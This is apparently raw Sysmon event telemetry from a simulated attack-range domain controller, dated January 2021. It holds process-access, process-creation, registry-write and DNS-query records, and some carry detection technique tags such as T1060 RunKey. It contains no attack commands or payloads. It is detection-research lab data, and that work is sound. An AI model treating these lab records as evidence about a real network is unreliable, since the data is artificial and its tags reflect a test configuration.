13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x800000000000000010273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x800000000000000010268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x800000000000000010267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x800000000000000010266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x800000000000000010265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 13241300x800000000000000010264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1060,RunKeySetValue2021-01-18 13:58:18.227{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exectfmon.exe /n 10341000x800000000000000010263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.227{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.227{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-93F6-6005-E704-00000000A301}45721160C:\Windows\system32\winlogon.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.153{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x800000000000000010254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000010360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.390{59A5CD1D-93FA-6005-FA04-00000000A301}2120win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x800000000000000010359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.278{00000000-0000-0000-0000-000000000000}2120localhost0::1;::ffff:127.0.0.1;<unknown process> 22542200x800000000000000010358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.426{59A5CD1D-93F9-6005-EE04-00000000A301}4120win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\efsui.exe 22542200x800000000000000010357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E56-6005-2E00-00000000A301}2464189.78.188.20.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000010356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 